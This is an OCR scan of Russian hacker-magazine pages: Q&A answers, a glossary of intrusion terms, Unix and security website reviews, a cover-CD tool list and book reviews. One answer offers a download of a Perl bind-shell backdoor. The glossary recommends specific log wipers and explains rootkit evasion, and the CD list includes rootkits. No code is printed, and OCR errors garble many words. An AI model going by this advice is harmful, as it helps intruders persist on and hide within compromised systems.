свежий релиз. Кроме 
этого, проверь систему 


на наличие руткита - 
возможно, взломщик 90 
сих пор использует ре- 
сурсы твоего сервера. 


+ МХ 


Пожалуйста! Можешь 


воспользоваться моим 
любимым перловым 
бэкдором. Скрипт отк- 
рывает порт 37900 и 
при подключении за- 
пускает /bin/sh в инте- 
рактивном режиме. Сце- 
нарий весит всего 317 
байт, забирай его с мое- 
го сервера /\!/p)///orb.con- 
vex.ru/bd.pl. 
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Для пересылки логов sys- 
1094 открывает 514 udp- 
порт, который служит для 
приема данных. Установи 
сервис с открытым портом 
на машине для хранения 
журналов (запускай де- 
мон с параметром -г). За- 
тем занеси в 
/etc/syslog.conf (на серве- 
рах, с отсылаемыми лога- 
ми) строку вида *.* @ag- 
рес_системы, и все жур- 
налы будут передаваться 
на удаленный сервер. 


Запусти утилиту dig с 
параметром «@ag- 
рес_сервера chaos txt 
version.bind», и уви- 
дишь версию сервера. 
Можно отфильтровать 
вывод по шаблону 
VERSION.BIND, тогда 
ответ займет всего од- 
ну строку. Набери тап 
dig, и узнаешь, что 
еще можно сделать с 
помощью этой чудес- 
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Докучаев Дмитрий aka Forb (forb@real.xakep. 


ГЛОССАРИЙ 


ОСНОВНЫЕ ПОНЯТИЯ ПО ВЗЛОМУ +МХ-СИСТЕМ 


Бэк- 


gop 


(backdoor) - 


небольшая 
программа, 
оставляющая лазейку для 
удачливого злоумышлени- 
ка на взломанной им сис- 
теме. Бэкдор может предс- 
тавлять собой уже ском- 
пилированный файл или 
сценарий на подручном 
языке, например, на Perl. 
Как правило, бэкдор отк- 
рывает порт на сервере и 
ожидает подключения. Ес- 
ли коннект произошел, за- 
пускается /bin/sh. Наворо- 
ченные бэкдоры имеют 
возможность закрыть сое- 
динение по тайм-ауту в це- 
лях безопасности. 


Руткит (rootkit) - 

комплект, предназ- 
наченный для сокрытия 
взломщиком своего пре- 
бывания на сервере. Бла- 
годаря установке руткита 
все действия хакера оста- 
ются засекреченными: 
открытые порты не светят- 
ся в netstat, /bin/Is не по- 
казывает определенные 
файлы, /bin/ps скрывает 
процессы и т.п. Если гово- 
рить о том, какими бывают 
руткиты, то можно выде- 
лить два вида: изготовлен- 
ные в форме прекомпи- 
ленных бинарников либо 
изготовленные в форме 
ядерных модулей. Второй 
вариант предпочтительнее 
и безопаснее, ибо LKM 
подменяет системные вы- 
зовы, а затем стирает себя 
из таблицы загруженных 
модулей. Соответственно, 
все бинарники остаются 
старыми, а утилиты типа 
chkrootkit говорят, что сис- 
тема в полном порядке :) 
(это справедливо лишь 
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для самых тривиальных 
утилит подобного рода - 
прим. AvaLANche'a). 


Chkrootkit - специ- 

альная программа, 
позволяющая проверить 
систему на наличие уста- 
новленного руткита. Прога 
поставляется с базой всех 
известных хакерских 
комплектов. По этой базе 
и ведется сканирование. 
Также chkrootkit обраща- 
ет внимание на наличие 
сниферов и исследует 
МО5-сумму бинарных фай- 
лов. В случае ее измене- 
ния программа оповещает 
админа о возможном втор- 
жении хакера. 


Logwiper (logcleaner) - 

небольшая програм- 
ма, позволяющая чистить 
системные журналы (ло- 
ги). Обычно [одуйрег'ы 
создаются для бинарных 
логов (/var/log/wtmp, 
/var/run/utmp/, 
/var/log/lastlog), которые 
вычистить не так-то прос- 
то. Для обращения к этим 
логам нужно знать специ- 
альную структуру utmp, 
которая описана в хидере 
/usr/include/utmp.h. Имен- 
но поэтому большинство 
logwiper'oB написано на 
Си. В качестве примеров 
могу привести три хоро- 
ших logcleaner'a: Vanish2, 
grlogwipe и Zap2. 


Аккаунт (account) - 

учетная запись на 
сервере. Один из фактов 
взлома - получение ва- 
лидного аккаунта. При 
этом слово «валидный» 
означает то, что юзер дол- 
жен иметь хороший кома- 
ноный интерпретатор 
(/bin/sh, /bin/bash и T.g.) в 


качестве оболочки. В про- 
тивном случае взломщику 
нет никакой выгоды от 90- 
бытого аккаунта. 


Дефейс (deface) - 

замена главной 
НТМЕ-страницы на web- 
сайте. Несмотря на то что 
дефейс - удел скриптки- 
дисов (script-kiddies - под- 
вид мегахакеров, умею- 
щих использовать только 
известные баги и готовые 
эксплоиты), на популяр- 
ных порталах по безопас- 
ности вывешен ТОР де- 
фейсов известных сайтов. 
Но, по мнению серьезных 
хакеров, дефейс - это 
просто ребячество. Насто- 
ящий взлом должен при- 
водить к абсолютным пра- 
вам на атакуемом сервере. 


Хэш (hash) - значе- 

ние некоторой (og- 
нозначной, в противном 
случае происходит колли- 
зия) фунции (хэш-функ- 
ции) какого-либо аргумен- 
та. Причем по хэшу, даже 
зная вид функции, нельзя 
вичислить ее аргумент (то 
есть то, от чего "берется 
хэш"). Звучит немного за- 
путанно, но именно эта 
формулировка наиболее 
точно описывает то, что 
сейчас называют хэшем. 
Хэширование в последнее 
время применяют для 
"шифрования" паролей: в 
системе хранится только 
значение хэш-функции от 
текстовой строки - самого 
пароля. При антентифика- 
ции заново вычисляется 
хэш от вводимого пользо- 
вателем пароля, и если он 
совпадает с хранящимся в 
системе, ползователь 
"пускается" в систему. Хэ- 
ширование может осущес- 


твляться каким угодно ал- 
горитмом, но если гово- 
рить о *тх-системах (да и 
не только о них), наиболее 
распространенным являет- 
ся MD5. Он нашел свое 
применение в шифрова- 
нии теневых (Shadow) па- 
ролей, а также паролей, 
хранящихся в MySQL. 


Задосить - провести 

DoS/DDoS-ataky. Ta- 
кое нападение приводит к 
тому, что атакуемый сер- 
вер перестает нормально 
функционирвать (виснет, 
перестает отвечать на 
удаленные запросы). Оно 
и понятно, ведь DoS чаще 
всего основывается на 
беспорядочном флуде (по- 
сылке огромного количе- 
ства сетевых пакетов), в 
результате которого сер- 
вер просто захлебывается 
в приходящем мусоре и не 
успевает анализировать 
данные. 


Эксплоит, сплоит 

(exploit) - программа, 
реализующая какую-то 
ошибку в сервисе или сис- 
темном бинарнике. Сплоит 
можно назвать эферектив- 
ным, если он ломает уда- 
ленный демон, открывая 
на машине удаленный ру- 
товый шелл. Но реальных 
эксплоитов очень мало, 
обычно рядовые сплоиты 
основаны на срыве буфе- 
ра (buffer overflow) у no- 
кальных файлов или go- 
быче прав nobody через 
модуль HTTPD. 


Маскарад (таздиег- 

ade) - не только Be- 
селый праздник, но и под- 
мена внутреннего 1Р-адре- 
са хостов, находащихся в 
"виртуальной" сети (типа 


i 


10.0.0.0, 192.168.0.0), IP- 
адресов шлюза, nocpeg- 
ствам которого эта сеть 
подключена в интернет. В 
результате чего локаль- 
ные машины (часто гово- 
рят: с нереальными адре- 
сами) получают право ис- 
пользовать интернет на 
полную катушку. 


Фаервол, брандмау- 

эр, сетевой экран 
(firewall) - программное 
или аппаратное средство, 
предназначенное для за- 
щиты компьютера (компь- 
ютерной сети) от внешних 
вторжений. В аппаратном 
виде фаервол представля- 
ет собой отдельный 
компьютер (или устрой- 
ство), специально npeg- 
назначенный для обработ- 
ки сетевых пакетов. Как 
правило, такие машины 
снабжены операционкой 
реального времени (с ми- 
нимальными задержками 
между командами), поэто- 
му они могут справиться с 
масштабной DDoS-atakon. 
Понятно, что их цена 
очень высока. В локаль- 
ных сетях общего назна- 
чения применяются прог- 
раммные фаерволы. В 
Linux такая программа на- 
зывается iptables, в 
FreeBSD - ipfw, в OpenBSD 
- pf. Эти проги выполняют 
одну роль - анализируют 
заголовки пакетов и при- 
нимают различные реше- 
ния на основе правил, на- 
писанных системным адми- 
нистратором. 


Рулес (от rule) - пра- 
вило, которое запи- 
сывается в таблицы фаер- 


вола. Рулесы могут зада- 
ваться как для разреше- 
ния, так и для запреще- 
ния приема/отправки па- 
кета. Обычно подобное 
правило включает в себя 
адрес отправителя/полу- 
чателя и порт назначения, 
а также политику. Однако 
рулесы могут включать в 
себя очень много пара- 
метров, а могут не вклю- 
чать ничего, кроме поли- 
тики. Все зависит от адми- 
на и его умственных спо- 
собностей :). 


Брутфорс (brute 

force) - взлом "гру- 
бой силой", основанный 
на упорядоченном перебо- 
ре пароля в люб. Если 
взломщик добыл пароль- 
ный хэш, он может осуще- 
ствить брутфорс по слова- 
рю либо по произвольным 
символам. Исход брутфор- 
са никто предугадать не 
может: в случае действи- 
тельно сложного и длин- 
ного пароля взломщику 
понадобится много милли- 
онов лет, чтобы перебрать 
все возможные варианты. 


Брутфорсер (brute- 

forcer) - программа, 
позволяющая организо- 
вать длительный процесс 
брутфорса. Если говорить 
об удаленном переборе 
(когда негодяй подбирает 
пароль на определенный 
удаленный сервис), хоро- 
шим брутфорсером явля- 
ется софтина Brutus nog 
Win32 и hydra под UNIX. 
Хотя никто не мешает Ha- 
писать собственный брут- 
форсер и отточить его под 
конкретный сервис. Так 


делают многие хакеры. В 
случае локальных атак, 
когда у злоумышленника 
имеется парольный хэш, 
он прибегает к утилитам 
MDSInside, John The 
Ripper unu LOphtcrack. 


Bot (bot, от robot) - 

специальная прог- 
рамма-робот, послушно 
выполняющяя удаленные 
команды хозяина (ботово- 
ga), чаще всего через IRC. 
Как только команда посту- 
пает, бот осуществляет 
злые действия - проводит 
DoS, ищет баги в софте, 
закидывает приватами 
жертву и т.д. Ситуация 
усугубляется, когда на og- 
ном канале находятся go 
тысячи ботов. Все они, как 
ты уже догадался, запу- 
щены на взломанных сер- 
верах (или затрояненных 
десктопах). 


Баннер (Баппег) - за- 

головок какого-либо 
сервиса. Баннер по умол- 
чанию выводит полную 
информацию о названии и 
версии службы, а также 
может содержать данные 
об операционной системе. 
Небезопасно, правда? 
Именно поэтому баннеры 
стараются подменять или 
урезать. Если админ назо- 
вет бажный ProFTPD 3a- 
щищенным VSFTPD, это 
отпугнет неопытного 
взломщика, и сервер сло- 
мают не так быстро. Часто 
администраторы заменяют 
баннер у HTTPd, FTPd u 
SMTPd. 


Снифинг (sniffing) - 
перехват данных при 


помощи специальных 
программ - сниферов. Как 
правило, они устанавлива- 
ются на маршрутизаторе и 
перехватывают пакеты во 
всей локальной сети. В па- 
кетах может содержаться 
как мусор, так и важная 
информация, но взломщи- 
ков интересуют обычно 
только пароли на различ- 
ные сервисы. Именно эти 
данные снифер и старает- 
ся поймать. Правда, ему 
не всегда это удается - 
часто админы запускают 
сервисы через защищен- 
ное SSL-coeguHeune. Мо- 
жешь ознакомиться со 
сниферами под *nix на 
странице packelstormsecurl- 
ty.nl/sniffers. 
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Атака MiM (Man-In- 

the-Middle) - атака, 
при которой хакер распо- 
логается между двумя уз- 
лами с целью перехвата и 
подмены передаваемой 
информации. Область при- 
менения этой атаки очень 
велика, ей подвержен как 
протокол передачи пуб- 
личных ключей во всех 
асимметричных алгорит- 
мах, так и ARP. 


Спуфинг (spoofing) - 
подмена адреса 
(обычно обратного) в сете- 
вом пакете. Особый инте- 

рес в последнее время 
представляет АКР-спу- 
финг, позволяющий зани- 
маться снифингом даже в 
коммутируемых сетях. ae 


Отдых, который вам нужен 
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Т. 945 3003 
945 4579 
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WEB 


WWW.LINUX.ORG.RU 


Один из самых попу- 

лярных в сети ресур- 
сов, посвященных Мпих. 
Здесь ты найдешь общие 
сведения о Мпих и многих 
дистрибутивах этой замеча- 
тельной OCy, а также боль- 
шое количество линков на 
интересные ресурсы. Темати- 
чески сайт поделен на нес- 
колько разделов: Новости, 
Галерея, О Linux, Форум, 
Дистрибутивы, Документа- 
ция и Ссылки. Имеется неп- 
лохой поиск по ключевым 
словам. Отдельно необходи- 
мо сказать о документации. 
На сайте содержится огром- 
ное количество всевозмож- 
ных доков на русском языке. 
Это и статьи, и обзоры и 
ГАО'и no Linux. Имеется хо- 
рошая коллекция русско- 
язычных МАМ№'’ов, руковод- 
ства по программам GNU, 
всевозможные книги по 
Linux и Unix и даже перевод 
лицензий GNU :-). A перево- 
ды серии Linux HOWTO вооб- 
ще вынесены на отдельную 
страницу. Короче, настоя- 
щий информационный рай 
для начинающих и не толь- 
ко. Век живи - век учись! 


Многие говорят об 
этом сайте как о луч- 
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ПОЛЕЗНЫЕ РЕСУРСЫ ИНТЕРНЕТА 


WWW.LINUXRSP.RU 


шем сайте для разработчи- 
ков программ с открытым ко- 
goo. И это действительно так. 
Приятно поражают четкость 
и грамотная структурирован- 
ность информации. Только в 
разделе Программы, содер- 
жащем ссылки на различное 
программное обеспечение, 
более девяти крупных под- 
разделов, которые в свою 
очередь разбиваются в сред- 
нем на 10-15 подпунктов. Пот- 
рясающая детализация! Бо- 
лее того, организован даже 
поиск необходимой тебе 
программы. Ежедневно об- 
новляемые новости, боль- 
шое количество статей 
(опять же прекрасно струк- 
турированных), различная 
документация и много другой 
полезной инфы из мира 
Open Source. Имеется боль- 
шое разнообразие MAN'oB 
под Linux, FreeBSD и Solaris. 
В разделе Советы ты най- 
дешь ответы на многие воп- 
росы и большое количество 
полезных рекомендаций. 
Кроме этого, портал разбит 
на тематические мини-порта- 
лы: solaris.opennet.ru, 
bsd.opennet.ru, cisco.open- 
net.ru, linux.opennet.ru, 
web.opennet.ru, security.open- 
net.ru, palm.opennet.ru и 
ftp.opennet.ru, что, несомнен- 
но, что делает значительно 
удобнее и быстрее поиск 
действительно полезной ин- 
формации. Отличный форум, 
большое количество ссылок, 
документации и многое дру- 
гое - ресурс на самом деле 
незаменим. 


Неплохой сайт со 


ставшим уже станда- 
ртным «джентльменским» 
набором: Статьи, Документа- 
ция, Программы, Ссылки... 
Есть возможность подпи- 
саться на весьма популяр- 
ную (сейчас более 18 тысяч 
подписчиков) рассылку све- 
жих новостей несколько раз 
в неделю. Есть так называе- 
мая «дискуссионная рассыл- 
ка» - своего рода FAQ, a, 
точнее, вопросы и ответы, 
возникающие при работе с 
OC Linux. Удобная и полез- 
ная штука. Неплохие темати- 
ческие ссылки и наличие 
официальных пресс-рели- 
зов делают этот сайт go- 
вольно интересным и позна- 
вательным. 


WWW.SECURITY.NNOV.RU 


Один из лучших оте- 

чественных ресурсов 
по безопасности. Создал 
проект широко известный в 
узких кругах ЗАРАЗа. Он же 
его практически в одиночку 
и поддерживает. На сайте 
собрано большое количест- 
во различной информации 
по вопросам безопасности, 
регулярно обновляющиеся 


новости, подробные описа- 
ния различных багов, а так- 
же отличная коллекция 
эксплоитов. Все это, помно- 
женное на отличный и гра- 
мотный поисковый движок, 
приводит к тому, что любой 
мало-мальски уважающий 
себя хакер обязательно заг- 
лядывает гости к ЗАРАЗе. 


WWW.SECURITYLAB.RU 


Уж коли затронули бе- 

зопасность, нельзя не 
упомянуть еще один крутой 
и мегапопулярный портал. 
Да, именно СекЛаб! Одна 
только коллекция полезных 
соффтин и утилит (более 
5000!) говорит сама за себя. 
Ежедневные новости из ми- 
ра компьютерной безопас- 
ности, отличная рассылка, 
возможность задать свой 
вопрос и получить на него 
ответ, большое количество 
документации, подробней- 
шее описание багов на рус- 
ском языке, прекрасный по- 
иск - все это поможет тебе 
грамотно защитить и настро- 
ить свой комп и прекрасно 
соориентироваться в мире 
security. 


WWW.NIXP.RU 


«Цель проекта - помо- 
BY гать начинающим в 
УМХ-основанных операци- 
онных системах, быть источ- 
ником интересной и нужной 
информации пользователям 
*nix, самосовершенствовать- 
ся в этой сфере...». И ресурс 
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действительно служит этой 
благородной цели. Большое 
количество статей по уста- 
новке, настройке, работе и 
т.п. в *nix-cucTemax, свежие 
новости, ссылки, сост, обзо- 
ры софта под никсами, голо- 
сование посетителей за лю- 
бимые софтины... Имеются 
даже обои на рабочий стол 
:). Ресурс имеет свой канал в 
IRC: #nixp в сети WeNet 
(irc.wenet.ru), также функци- 
онирует \М/еБ-гейт для выхо- 
да в IRC через сайт. Все это 
снабжено очень приятным и 
дружественным «а-ля *пх» 
интерфейсом, создающим 
атмосферу полного погру- 
жения в мир *nix. 


WWW.UNDEADLY.ORG 


Undeadly.org, unu 

OpenBSD Journal. Ин- 
тересное название (особен- 
но в свете того, что в пери- 
og с 2001 г. по апрель 2004 
г. портал назывался dead- 
ly.org :-)) объясняется тем, 
что в один прекрасный мо- 
мент (а именно 1 апреля 
2004 г:-)) создатели жур- 
нала ушли из него и нало- 
жили свои копирайты на 
все материалы, что 
фактически привело к их 
полной недоступности. Пос- 
ле соблюдения всех авторс- 
ких прав, Daniel Hartmeier 
смог сохранить для «жаж- 
дущих» более 1100 статей с 
более чем 14000 коммента- 
ми и назвал ресурс undead- 
ly. Это хороший англоязыч- 
ный сайт, посвященный 
OpenBSD. Крупный форум- 
ГАО по большому количе- 
ству самых различных воп- 
росов, связанных с миром 
OpenBSD. Постоянная жи- 
вая дискуссия по возникаю- 
щим проблемам, различным 
настройкам, конфигуриро- 
ванию ит.д. Множество 
различных ссылок и другой 
информации. Регулярно об- 
новляется. 


WWW.BSDNEWS.COM 
. Eels : 
| _— ACS PAA MEO 


Еще один известный = 

англоязычный ресурс 
по В$)-системам. Доброт- 
ный новостной портал. Раз- 
делы: Daemon News Ezine 
(статьи), BSDNews (новости), 
BSD Ма! (магазин с широким 
ассортиментом из мира BSD 
- дистрибутивы, утилиты, 
различная атрибутика), BSD 
Support Forum (саппорт-фо- 
рум :-)) и др. Реальные люди, 
уважающие BSD и знающие 
английский язык, наверняка 
найдут здесь много интерес- 
ного. 


=, 


Крупный русскоязыч- 

ный Linux-noptan, ос- 
нованный еще в 1999 году. 
Приличное количество доку- 
ментации и маленькое коли- 
чество программ :-(. Интерес- 
ные обзорные статьи. Хоро- 
шо сделан «каталогизатор» 
по русскоязычным, англоя- 
зычным и прочим ресурсам. 
Свежие новости (с российс- 
ких и зарубежных ресур- 
сов), пресс-релизы, продажа 
дистрибутивов. Неплохой 
сайт, но, на мой взгляд, не 
очень насыщенный и дина- 
мИчнЫЙ. 
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Своей главной зада- 


чей Ипих-центр ставит | | 
ни много ни мало продвиже- | ' I Г i / 
ние операционной системы — 
Linux в России. Благодаря — | 
прямым контактам с произ- 
Г. Г 4! ’ а! | 
Vis wid 


водителями дистрибутивов и 
ПО многие новинки в мире 
*nix-CUCTeM появляются в 
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Ипих-центре практически 
одновременно с мировой 
премьерой. Действует хоро- 
ший новостной канал, ведут- 
ся различные интересные 
рейтинги. В рамках проекта 
идет работа над «Виртуаль- 
ной энциклопедией Мпих» - 
своего рода систематизиро- 
ванным каталогом по рус- 
скоязычным ресурсам, пос- 
вященным Linux. «Книга» 
действительно очень инте- 
ресна и будет полезна мно- 
гим. В собственном интер- 
нет-магазине продаются кни- 
ги, дистрибутивы, софт, иг- 
ры, различная атрибутика - 
все, что так или иначе связа- 
но с Linux. Ресурс оставил 
очень приятное впечатле- 
ние. 


WWW.PACKETSTORMSECU- 
RITY.NL 


Отличный портал по 

безопасности. Статьи, 
интересные ссылки, подроб- 
ные описания багов... Но 
главное - огромный выбор 
самого различного софта. 
Здесь есть чем поживиться! 
Руткиты, сниферы, бэкдоры - 
все, что душе угодно! При- 
чем сосрт очень удобно раз- 
делен на категории, что зна- 
чительно облегчит твой не- 
легкий труд :-). Стоит сказать 
и об отличном, функциональ- 
ном поиске. Один минус - анг- 
лоязычный, гад! :-). Но ведь 
для реального хакера это не 
проблема, правда? 


WWW.XAKEP.RU 


Самое главное чуть не 

забыли! :-) Не зря мы 
тебя со страниц каждого но- 
мера призываем: «не ведись 
на чепуху - читай 
www.xakep.ru!» Здесь ты 
найдешь множество самой 
различной иноры из хакерс- 
кого мира и не только. Ре- 
сурс постоянно обновляется, 
и, будь уверен, ты всегда 
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найдешь тут свеженький 
эксплоит и описания багов 
на русском языке. Кроме 
этого, статьи по взлому, за- 
щите и всему-всему-всему! 
Знай наших! 


WWW.LINUXTODAY.COM 


Еще один англоязыч- 
[>> ный ресурс, посвя- 
щенный Linux. Довольно 
крупный портал, на котором 
собрано много полезной ин- 
формации. Название четко 
определяет концепцию - 
сайт регулярно обновляется 
и тщательно следит за ма- 
лейшими «дуновениями» в 
мире Linux. Статьи, новости, 
обновления безопасности, 
обсуждение различных тем, 
большое количество полез- 
ных и интересных ссылок - 
все это и многое другое ты 
найдешь на страницах дан- 
ного ресурса. 


Еще один старожил 

рунета в области ин- 
формационной безопаснос- 
ти. Очень популярный ресурс 
(средняя посещаемость - 
около 3500 человек в день), 
на котором содержится ог- 
ромное количество вкусной 
инфы. Тут и прекрасная биб- 
лиотека - постоянно обнов- 
ляющаяся подборка статей 
и книг, и НОВОСТИ, И ВОЗМОЖ- 
ность «большой» рассылки 
(можно выбрать как по от- 
дельности любой из разде- 
лов: BuqTraq: Обзор, RSN, 
БСК, Закон есть закон, так и 
в любой «комплектации» 
включая полную). Ресурс 
обладает весьма почетными 
наградами и по праву счита- 
ется одним из достойных. 


Сайт команды NSD - 
постоянных авторов Х 
(смотри, например, «Экспло- 


итный ликбез» в июньском 
номере J[), на котором содер- 
жится много разной инфор- 
мации по взлому и безопас- 
ности, интересные новости, 
снабженные поиском... Уде- 
лено отдельное внимание бе- 
зопасности и грамотной наст- 
ройке *nix-cuctem. Большое 
количество удобно структу- 
рированного сосрта и т.д. 


WWW.BSDNEWSLETTER.COM 


Англоязычный ресурс, 
посвященный BSD- 


системам. Новости, статьи, 
мануалы, FAQ - короче, пол- 
ный набор приличного порта- 
ла. Также есть разбитый на 
категории cocpT (например 
Archivers, Communication, 
Networking, Servers, 
Programming и T.g.). OTgenb- 
HO на сайте выделены разде- 
лы Programming и Security. 
Имеется также приличная 
коллекция самых различных 
драйверов. Правда, по всей 
видимости, обновляется ре- 
сурс не очень активно (во 
всяком случае, в разделе 
«Recent BSD News and 
Articles» последний матери- 
ал датирован 6 июня), что, 
конечно, не совсем гуд :-(. 


WWW.LINUXJOURNAL.COM 


Linux Journal - ежеме- 

сячный журнал Linux- 
сообщества, а \\W\"/,//NUX/Our~ 
па(сот - официальный сайт 
этого журнала :-). Здесь ты 
найдешь описание журнала, 
каждой из рубрик, анонсы 
новых номеров, статьи и раз- 
личные материалы из пре- 
дыдущих выпусков и другое. 
Помимо освещения самого 


журнала на сайте представ- 
лено большое количество 
разных пресс-релизов из 
«жизни Linux-community». 
Имеется возможность 
оформления подписки и рас- 
сылки. Англоязычный :-). 


WWW.LINUX.COM 


Как нетрудно gora- 

даться Linux.com - 
англоязычный ресурс, пос- 
вященный известной оси. 
Довольно насыщенный пор- 
тал, на котором ты найдешь 
множество статей, свежие 
новости из мира Linux, 
весьма содержательные об- 
зоры многих дистрибутивов 
и их последних релизов 
(например, в разделе 
Distribution Center предс- 
тавлены отдельные подраз- 
делы, посвященные Debian 
GNU/Linux, Gentoo Linux, 
Fedora, Mandrakelinux и gp.). 
Стоит отметить, что раздел 
Articles (Статьи :)) очень 
удобно тематически разде- 
лен на несколько подразде- 
nos: Applications, Servers, 
Programming и Community и 
тебе не придется монито- 
рить весьма приличный ар- 
хив статей в поисках нуж- 
ного материала. Очень ин- 
тересен раздел Tips - боль- 
шой тематический форум- 
ГАО, на котором можно най- 
ти много полезной инфор- 
мации и советов на конкрет- 
ные вопросы по программи- 
рованию, администрирова- 
нию, конфигурированию и 
многому-многому другому, с 
чем придется столкнуться 
как опытному челу, так и 
юзеру, который только пог- 
ружается в мир Ореп 
Source. Linux.com - достой- 
ный участник нашего об- 
зора. 


КТО ИЩЕТ - ТОТ ВСЕГДА 
НАЙДЕТ! 


Теперь ты немного ориен- 
тируешься в пространстве 
*nix. Читай, проверяй, тести- 
руй, пиши и думай, думай, 
думай! Только так ты почув- 
ствуешь дух свободы и нас- 
тоящего креатива в мире 
Open Source! BE! 


@ Спец 08(45), Buffer. 
Overflow 

© Хакер 08(68) 

® Железо 08(06) 

@ Мобильные 
компьютеры 08(47) 

@ Обновления для 
Windows за месяц 


ВЕСЬ СОФТ ИЗ НОМЕРА! 
ЗАЩИТА ОТ НАПАДЕНИЯ 


ш |PTables 1.2.11 

и Patch-O-Matic 20040621 

и Centron IPTables Firewall Gui 

и Firewall Builder 

ш Portsentry 1.0 

и Netcat 4Windoze 

и RSBAC Linux Kernel/Admin panel 

и + дистрибутивы: Devil Linux, SELinux 


ИССЛЕДОВАНИЕ 

НА УЯЗВИМОСТИ 

и CeS [ CGI Exploit Scanner ] 

m mscan 1.0 public release 

mw portscan 

и XSpider 7.0.916 

mw XSSH Бу X_treme 

и Ethereal 0.10.6 (Unix/Win) 

ш Ettercap 0.7.0 

mw Knocker 0.7.1 

mw Nessus 2.1.1 

и NSAT 1.5 

и PATH (Perl Advanced TCP Hijacking) 
mw ScanSSH 2.0 

mw SendlP 

и VANISH2 

и Web Password Checker (WPC) 0.1 
и Yakr (Yet Another Kernel Rootkit) 
и |PPersonality 2.4.18 

mw OSDet 0.4 (для nmap) 

и Firewalk 5.0 

и HPing 2.0.0-rc3 

и NMap 3.70 (Unix/Win) 

mw OpenSSH 3.9р1 


„„и множество полезного софта для твоего *nix box'a 


ИЕЩЕ: 


ОСНОВАНА B 1992 


НА ДИСКЕ: 


Весь софт из номера 


Linux Kernel 2.0.40/2.2.26/2.4.27/2.6.8.1 
Дистрибутивы: Devil Linux, SELinux 


® Обновления Windows 
(9x/XP/NT/2000/2003) 

© Спец 08(45), Buffer overflow 

© Августовские номера 

Хакер, Железо, МС 


Плюс: 

Софт для исследования на уязвимости 
Защита от нападения 
Лучший софт от NoNaMe 


и Hydra 4.1 
и JohnTheRipper 1.6 (Unix/Win) 

ш THC SSH Crack (восстановление 
ключа SSH) 

и VLogger 2.1.1 


СВЕЖИЙ СМОТЫЙ СОФТ 
и Linux Kernel 
2.0.40/2.2.26/2.4.27/2.6.8.1 

и WinPcap Library 3.1b3 

ш PGP 2.6.3i/8.10 (+сорцы) 


CO@T OT NONAME 
и TagScanner 4.9 билд 490 ВС1 

и Password Agent v2.3.3 

и xp-AntiSpy v3.83 

и NetAdjust Anonymous Proxy v5.2.0.0 
и DU Meter v3.06 (build 186) 

и Bookshelf v1.0d 

и EffeTech HTTP Sniffer v3.5.2 

и SmartFix v3.7 

и XDCC Catcher Basic v2.0.2.0 

mw XP SysPad v6.0.5.7 

и Free Download Manager (FDM) v0.9 
(build 161) 

mw HD Tune v2.00 

a NI Transliterator v2.2 

и Blackman's E-mail encoder 

и хру vO.8 (beta) 


Более 70% серверов 
интернета работают 
nog *nix. И после это- 
го на твоем компе все еще не 
стоит самая секьюрная в мире 
ОСЬ? Тогда мы идем к тебе! 


и + бонус от группы SH8 


и Все это Ha ЗАГРУЗОЧНОМ CD 
(полная версия) Trinux! 
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ОБЗОР ИНТЕРЕСНОЙ ЛИТЕРАТУРЫ 


КОНФИГУРИРОВАНИЕ 

И НАСТРОЙКА БАЗ 
ДАННЫХ НА ПЛАТФОРМЕ 
SOLARIS 

ИВ ДРУГИХ СИСТЕМАХ 
UNIX 


СПб.: ООО "ДиаСофтЮП" 


Пэкер Алан Н. 


Разумная цена: 520 рублей 


Если ты работаешь с 

системами баз дан- 
ных Oracle, Sybase или 
Infomix, то эта книга тебе 
пригодится. В ней приве- 
дены практические советы 
по определению парамет- 
ров системы (в первую 
очередь книга заточена 
nog Solaris), грамотному 
конфигурированию ЦП, 
памяти и оптимизации дан- 
ных. Все телодвижения 
снабжены реальными при- 
мерами и наглядными лис- 
тингами. Подробно рас- 
смотрена реализация мо- 
ниторинга: инструмента- 
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рий, интервалы монито- 
ринга, мониторинг памяти, 
мониторинг дисков, мони- 
торинг сети, мониторинг 
ЦП, мониторинг процес- 
сов, мониторинг прерыва- 
ний, мониторинг самой 
СУБД. Все это поможет 
грамотно настроить 
собственную БД, обеспе- 
чив надежность и высо- 
кую производительность. 


UNIX ИЗНУТРИ 


СПб.: Питер 


Вахалия Ю. 


Разумная цена: 415 рублей 


Название книги оп- 

равдывает ее содер- 
жание: подробно рассмат- 
ривается внутреннее уст- 
ройство UNIX. Рассмотре- 
ны важнейшие компонен- 
ты ядра, сравниваются 
структуры в различных 
вариантах UNIX. Описаны 
и давно используемые 
средства (многонитиевые 
ядра, многопроцессорные 
системы, системы реаль- 
ного времени, распреде- 
ленные файловые систе- 
мы), и современные Cpeg- 
ства, используемые в 


SVR4.x, Solaris, SunOS, 
4.4BSD, Mach, OSF/1. Дос- 
таточно упомянуть, что ав- 
тор книги сам разрабаты- 
вал подсистемы ядра нес- 
кольких вариантов UNIX и 
читает лекции о внутрен- 
нем устройстве UNIX. 


UNIX: РУКОВОДСТВО 
СИСТЕМНОГО 
АДМИНИСТРАТОРА 


СПб.: Питер 


Разумная цена: 325 рублей 


В одной книге соб- 
BY рано множество 
практических приемов ра- 
боты с различными ресур- 


сами UNIX. Условно книга 
разбита на три части: ос- 


новы администрирования 
(с чего начать, запуск и 
останов системы, привиле- 
гии, управление процесса- 
ми, файловая система, 
пользователи, последова- 
тельные устройства, пери- 
одические процессы, резе- 
рвное копирование, логи, 
драйвера), работа в сетях 
(сети TCP/IP, маршрутиза- 
ция, сетевые аппаратные 
средства, система домен- 
ных имен, сетевая файло- 
вая система, почта, безо- 
пасность, меБ-хостинг) и 
разные жизненные ситуа- 
ции, которые часто встре- 
чаются на практике (пе- 
чать, анализ производи- 
тельности, взаимодей- 
ствие с Windows, политика 
администрирования, про- 
цессы-демоны). Изложен- 
ный материал касается че- 
тырех систем: Red Hat 
Linux, Solaris, HP-UX и 
FreeBSD. 


LINUX IP STACKS B 
КОММЕНТАРИЯХ 


Книга посвящена ор- 

ганизации и функци- 
онированию исходного ко- 
да ядра Linux с упором на 
реализацию стека IP-npo- 
токолов, включая TCP/IP, 
ICMP u UDP. Подробная 
информация по програм- 
мному коду семейства про- 
токолов ТСРЛР. Детали 
реализации каждого про- 
токола, соответствие меж- 
gy содержимым исходного 
кода ядра и документами с 
рекомендациями по конк- 
ретной реализации TCP/IP 
(RFC - Request for 
Comment). Дополнительно 
указано, как можно улуч- 


K.: Издательство "ДиаСофт" 


Сэтчэлл Стефан Т. 


Разумная цена: 216 рублей 


шить функции, расши- 
рить, исправить или доба- 
вить. Содержимое книги 
ориентировано на продви- 
нутых администраторов 
систем безопасности се- 
тей. На прилагающемся 
диске ты найдешь исход- 
ный код ядра Linux, доку- 
